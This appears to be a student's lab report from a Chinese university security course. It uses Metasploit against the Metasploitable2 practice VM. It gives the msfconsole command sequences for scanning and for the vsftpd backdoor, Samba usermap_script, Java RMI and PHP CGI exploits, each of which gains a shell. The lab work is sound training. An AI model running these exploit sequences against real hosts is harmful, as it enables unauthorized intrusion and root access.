首页 > 其他分享 >20222320 2024-2025-1 《网络与系统攻防技术》实验6实验报告

20222320 2024-2025-1 《网络与系统攻防技术》实验6实验报告

时间:2024-11-17 17:21:03浏览次数:1  
标签:set Java 漏洞 端口 192.168 2024 2025 20222320 1.108

目录

目录

1.实验目标

掌握metasploit的用法。

2.实验内容

下载官方靶机Metasploitable2,完成下面实验内容。

  •   (1)前期渗透
  • (2)Vsftpd源码包后门漏洞(21端口)
  • (3)SambaMS-RPC Shell命令注入漏洞(端口139)
  • (4)Java RMI SERVER命令执行漏洞(1099端口)
  • (5)PHP CGI参数执行注入漏洞(80端口)

3.实验过程

3.1 前期渗透

1.首先查找主机:

msfconsole 
search arp_sweep
use 0
set RHOSTS 192.168.1.0/24


查找到几个主机,1.108就是我们要攻击的主机了:

2.端口扫描:

search portscan/tcp
use 0
set RHOSTS 192.168.1.108
run


扫到许多开放端口
3.扫描系统:

search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.1.108
run


可以看出,这个是UNIX系统的Samba 3.0.20-Debian,445端口有漏洞

3.2 Vsftpd源码包后门漏洞(21端口)

对VSFTPD 2.3.4 的攻击就是通过向21端口发送一个特定字节的序列“:)结尾”来触发恶意的vsf_sysutil_extra()函数。一旦成功执行,就会在系统的6200端口打开一个后门,从而进行利用
选相应载荷就行

search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.1.108
run


看到+号就成功了,输入ifconfig显示的是靶机的ip,攻击成功

3.3 SambaMS-RPC Shell命令注入漏洞(端口139)

该漏洞传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行

search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.1.108
run

入侵成功后用uname -a验证,看到系统名,证明成功

3.4 Java RMI SERVER命令执行漏洞(1099端口)

Java远程方法调用,也就是Java RMI,它是一种机制,允许一个Java虚拟机中的对象去访问和调用另一个Java虚拟机中包含的方法。这与RPC基本相同,但是在面向对象的范例中,而非面向过程,它允许不在同一个地址空间中的Java程序互相通信。漏洞源于RMI Registry和RMI Activation Service(RMI激活服务)的默认配置,允许从远程URL中加载类。
之前扫描已经发现1099端口打开了

search exploit/multi/misc/java_rmi_server
use 0
set RHOST 192.168.1.108
run


攻击完成后,用

sessions -i 3     --进入服务
shell            --进入shell

进入shell用whoami验证,结果为rootx

3.5 PHP CGI参数执行注入漏洞(80端口)

该漏洞影响 PHP 的 CGI 模式。在此模式下,Web 服务器解析 HTTP 请求并将其传递给 PHP 脚本,然后脚本对其进行一些处理,查询字符串被解析并传递给命令行上的 PHP 解释器

search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.1.108
exploit

攻击顺利完成,输入dir:

4.问题及解决方案

按照实验指导书完成的,过程顺利,没什么问题

5.学习感悟、思考等

这次实验六在我看来倒不如说是对上次作业的一个小复习,这次实验的靶机环境稳定,简单;而且过程也详细给出了,基本没什么难点。是一次对metasploit框架的验证性复习,通过这次的几个端口攻击,我总结到就是扫主机,扫端口,查看端口是否有对应漏洞,根据漏洞进行攻击。流程就是这样,用工具让流程简单化了而已。

标签:set,Java,漏洞,端口,192.168,2024,2025,20222320,1.108
From: https://www.cnblogs.com/20222320zcc/p/18550712

相关文章

  • 2024.11.16模拟赛
    总结:日常犯困,日常去厕所清醒,日常疯狂调试,不日常四个半小时的模拟赛。打了T1的60分暴力+特殊样例,T4的40分暴力+特殊样例,但是T1不知道为什么\(dfs\)爆栈了,所以没骗到特殊样例的分,T4特殊样例式子推错,也没骗到分,所以最后T130分,T420分,共50分,挂了50分。关于T1:四个人,想了四个半小时,摸......
  • 2024-2025-1(20241321)《计算机基础与程序设计》第八周学习总结
    这个作业属于哪个课程<班级的链接>(2024-2025-1-计算机基础与程序设计)这个作业要求在哪里<作业要求的链接>(2024-2025-1计算机基础与程序设计第一周作业)这个作业的目标<深刻学习C语言,反思一周学习,温故知新>作业正文...本博客链接https://www.cnblogs.com/guchu......
  • 2024-2025-1 20241314 《计算机基础与程序设计》第八周学习总结
    2024-2025-120241314《计算机基础与程序设计》第八周学习总结作业信息这个作业属于哪个课程<班级的链接>(2024-2025-1-计算机基础与程序设计)这个作业要求在哪里2024-2025-1计算机基础与程序设计第八周作业这个作业的目标功能设计与面向对象设计面向对象设计过......
  • 2024-2025-1 20241415《计算机基础与程序设计》第八周学习总结
    如2024-2025-120241415《计算机基础与程序设计》第八周学习总结作业信息这个作业属于哪个课程2024-2025-1-计算机基础与程序设计这个作业要求在哪里2024-2025-1计算机基础与程序设计第八周作业这个作业的目标功能设计与面向对象设计,面向对象设计过程,面向对象语......
  • GBK&Unicode -2024/11/16
    UTF-8是一种编码规则为什么会有乱码:读取数据时未读完整个汉字编码和解码的方式不统一如何不产生乱码不要使用字节流读取文本文件编码解码时使用同一个码表,同一个编码方式publicstaticvoidmain(String[]args)throwsUnsupportedEncodingException{......
  • 2024.11.16 2024 CCPC济南站
    Solved:5/13Penalty:707Rank:101Rank(ucup):200比赛链接A.TheFool题意:给一个\(n\timesm\)的字符串矩阵,有一个字符串和其他不同,求这个字符串的位置。直接模拟即可。#include<bits/stdc++.h>usingnamespacestd;constintN=205;stringa[N];intmain(){ios::s......
  • 学期2024-2025-1 学号20241416 《计算机基础与程序设计》第8周学习总结
    作业信息|这个作业属于哪个课程|https://edu.cnblogs.com/campus/besti/2024-2025-1-CFAP||这个作业要求在哪里|https://www.cnblogs.com/rocedu/p/9577842.html#WEEK08||这个作业的目标|功能设计与面向对象设计,面向对象设计过程,面向对象语言三要素,汇编、编译、解释、执行||作......
  • 2024年大学生计算机大赛决赛-个人赛参考代码
    比赛链接A.退休代码voidsolve(){inta,b;cin>>a>>b;intnum=a+b;intres=(1000000+num-1)/num;cout<<res/12<<''<<res%12;}B.四季代码voidsolve(){ inta,b; scanf("%d-%d&qu......
  • 20222305 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    网络攻防实验报告姓名:田青学号:20222305实验日期:2024/11/15—2024/11/22实验名称:Metasploit攻击渗透实践指导教师:王志强1.学习内容1.Metasploit:是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode。2.渗透攻击模块(exploits):被动渗透攻击......
  • 2024长城靶场训练
    仿射密码首先题目描述使用仿射函数y=3x+9加密得到的密文为JYYHWVPIDCOZ,请尝试对其解密。flag为flag{大写明文}。1、使用在线网站直接破解或手工计算破解,获得flag。(参数a=3,b=9,对应仿射函数y=3x+9)仿射密码加密_仿射密码解密手工计算使用解密函数为D(x)=a^-1(x-b)(modm),......